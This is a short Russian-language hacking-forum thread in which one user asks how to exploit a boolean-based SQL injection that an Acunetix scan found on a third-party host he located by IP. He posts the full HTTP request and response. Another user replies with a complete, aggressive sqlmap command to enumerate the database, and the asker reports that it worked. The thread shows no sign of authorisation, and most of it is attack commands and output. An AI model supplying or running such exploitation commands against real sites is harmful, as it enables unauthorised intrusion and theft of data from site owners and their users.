Как раскрутить скулю?

[pakhom]

Нашел IP хоста, WAF нет. Просканил хост Acunetix, нашло SQLi:

URL encoded GET input id was set to 11/(3*2-5)


Tests performed:
1*11 => TRUE
11*209*204*0 => FALSE
(225-209-5) => TRUE
11/1 => TRUE
11/0 => FALSE
11/(3*2-5) => TRUE

Original value: 11

HTTP Request

GET /profile/collectioner?id=11/(3*2-5) HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://<host ip>/
Cookie: PHPSESSID=10224f7f7ca146d8b5c21b6c0fa9f22f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: <host ip>
Connection: Keep-alive

HTTP Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 Mar 2023 10:10:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/7.2.34
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 38892

 

[JeanZ]

sqlmap -u https://IP:PORT/profile/collectioner?id=11* -p id --risk 3 -v 3 --level 5 --random-agent --ignore-redirects --ignore-timeout --drop-set-cookie --text-only --tamper=uppercase --technique=B --hex --is-dba --banner --dbs

 

[pakhom]

sqlmap -u https://IP:PORT/profile/collectioner?id=11* -p id --risk 3 -v 3 --level 5 --random-agent --ignore-redirects --ignore-timeout --drop-set-cookie --text-only --tamper=uppercase --technique=B --hex --is-dba --banner --dbs

спасибо, раскрутилась